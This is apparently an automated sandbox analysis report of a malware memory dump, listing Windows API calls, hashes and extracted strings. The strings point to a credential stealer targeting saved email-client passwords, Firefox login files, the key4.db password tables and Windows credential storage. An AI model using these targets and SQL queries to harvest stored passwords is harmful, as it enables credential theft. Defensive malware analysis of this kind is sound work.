                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                      APIs
                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                      APIs
                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                      APIs
                      • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: EnumNamesResource
                      • String ID:
                      • API String ID: 3334572018-0
                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                      APIs
                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                      APIs
                      • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                      APIs
                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                      • API String ID: 2238633743-192783356
                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString_mbscmpstrlen
                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                      • API String ID: 3963849919-1658304561
                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID: (yE$(yE$(yE
                      • API String ID: 1865533344-362086290
                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                      APIs
                      • memset.MSVCRT ref: 0040EBD8
                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                      • memset.MSVCRT ref: 0040EC2B
                      • memset.MSVCRT ref: 0040EC47
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                      • memset.MSVCRT ref: 0040ECDD
                      • memset.MSVCRT ref: 0040ECF2
                      • _mbscpy.MSVCRT ref: 0040ED59
                      • _mbscpy.MSVCRT ref: 0040ED6F
                      • _mbscpy.MSVCRT ref: 0040ED85
                      • _mbscpy.MSVCRT ref: 0040ED9B
                      • _mbscpy.MSVCRT ref: 0040EDB1
                      • _mbscpy.MSVCRT ref: 0040EDC7
                      • memset.MSVCRT ref: 0040EDE1
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                      • API String ID: 3137614212-1455797042
                      • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                      • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                      APIs
                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                      • memset.MSVCRT ref: 0040E5B8
                      • memset.MSVCRT ref: 0040E5CD
                      • _mbscpy.MSVCRT ref: 0040E634
                      • _mbscpy.MSVCRT ref: 0040E64A
                      • _mbscpy.MSVCRT ref: 0040E660
                      • _mbscpy.MSVCRT ref: 0040E676
                      • _mbscpy.MSVCRT ref: 0040E68C
                      • _mbscpy.MSVCRT ref: 0040E69F
                      • memset.MSVCRT ref: 0040E6B5
                      • memset.MSVCRT ref: 0040E6CC
                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                        • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                      • memset.MSVCRT ref: 0040E736
                      • memset.MSVCRT ref: 0040E74F
                      • sprintf.MSVCRT ref: 0040E76D
                      • sprintf.MSVCRT ref: 0040E788
                      • _strcmpi.MSVCRT ref: 0040E79E
                      • _strcmpi.MSVCRT ref: 0040E7B7
                      • _strcmpi.MSVCRT ref: 0040E7D3
                      • memset.MSVCRT ref: 0040E858
                      • sprintf.MSVCRT ref: 0040E873
                      • _strcmpi.MSVCRT ref: 0040E889
                      • _strcmpi.MSVCRT ref: 0040E8A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                      • API String ID: 4171719235-3943159138
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                      • GetWindowRect.USER32(?,?), ref: 00410487
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                      • GetDC.USER32 ref: 004104E2
                      • strlen.MSVCRT ref: 00410522
                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                      • ReleaseDC.USER32(?,?), ref: 00410580
                      • sprintf.MSVCRT ref: 00410640
                      • SetWindowTextA.USER32(?,?), ref: 00410654
                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                      • GetClientRect.USER32(?,?), ref: 004106DD
                      • GetWindowRect.USER32(?,?), ref: 004106E7
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                      • GetClientRect.USER32(?,?), ref: 00410737
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                      • String ID: %s:$EDIT$STATIC
                      • API String ID: 1703216249-3046471546
                      APIs
                      • memset.MSVCRT ref: 004024F5
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • _mbscpy.MSVCRT ref: 00402533
                      • _mbscpy.MSVCRT ref: 004025FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$QueryValuememset
                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                      • API String ID: 168965057-606283353
                      APIs
                      • memset.MSVCRT ref: 00402869
                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                      • _mbscpy.MSVCRT ref: 004028A3
                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                      • _mbscpy.MSVCRT ref: 0040297B
                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                      • API String ID: 1497257669-167382505
                      APIs
                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                      • LoadCursorA.USER32(00000067), ref: 0040115F
                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                      • EndDialog.USER32(?,00000001), ref: 0040121A
                      • DeleteObject.GDI32(?), ref: 00401226
                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                      • ShowWindow.USER32(00000000), ref: 00401253
                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                      • ShowWindow.USER32(00000000), ref: 00401262
                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                      • memset.MSVCRT ref: 0040128E
                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                      • String ID:
                      • API String ID: 2998058495-0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                      • API String ID: 231171946-2189169393
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscat$memsetsprintf$_mbscpy
                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                      • API String ID: 633282248-1996832678
                      APIs
                      Strings
                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                      • , xrefs: 00406834
                      • key4.db, xrefs: 00406756
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memcmp$memsetstrlen
                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                      • API String ID: 3614188050-3983245814
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                      • API String ID: 710961058-601624466
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: sprintf$memset$_mbscpy
                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                      • API String ID: 3402215030-3842416460
                      APIs
                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                        • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                        • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                        • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                        • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                      • strlen.MSVCRT ref: 0040F139
                      • strlen.MSVCRT ref: 0040F147
                      • memset.MSVCRT ref: 0040F187
                      • strlen.MSVCRT ref: 0040F196
                      • strlen.MSVCRT ref: 0040F1A4
                      • memset.MSVCRT ref: 0040F1EA
                      • strlen.MSVCRT ref: 0040F1F9
                      • strlen.MSVCRT ref: 0040F207
                      • _strcmpi.MSVCRT ref: 0040F2B2
                      • _mbscpy.MSVCRT ref: 0040F2CD
                      • _mbscpy.MSVCRT ref: 0040F30E
                        • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                      • String ID: logins.json$none$signons.sqlite$signons.txt
                      • API String ID: 1613542760-3138536805
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                      • API String ID: 1012775001-1343505058
                      APIs
                      • memset.MSVCRT ref: 00444612
                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                      • strlen.MSVCRT ref: 0044462E
                      • memset.MSVCRT ref: 00444668
                      • memset.MSVCRT ref: 0044467C
                      • memset.MSVCRT ref: 00444690
                      • memset.MSVCRT ref: 004446B6
                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                        • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                      • memcpy.MSVCRT ref: 004446ED
                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                      • memcpy.MSVCRT ref: 00444729
                      • memcpy.MSVCRT ref: 0044473B
                      • _mbscpy.MSVCRT ref: 00444812
                      • memcpy.MSVCRT ref: 00444843
                      • memcpy.MSVCRT ref: 00444855
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset$strlen$_mbscpy
                      • String ID: salu
                      • API String ID: 3691931180-4177317985
                      APIs
                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                      • API String ID: 2449869053-232097475
                      APIs
                      • sprintf.MSVCRT ref: 0040957B
                      • LoadMenuA.USER32(?,?), ref: 00409589
                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                      • DestroyMenu.USER32(00000000), ref: 004095A7
                      • sprintf.MSVCRT ref: 004095EB
                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                      • memset.MSVCRT ref: 0040961C
                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                      • DestroyWindow.USER32(00000000), ref: 0040965C
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                      • String ID: caption$dialog_%d$menu_%d
                      • API String ID: 3259144588-3822380221
                      APIs
                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
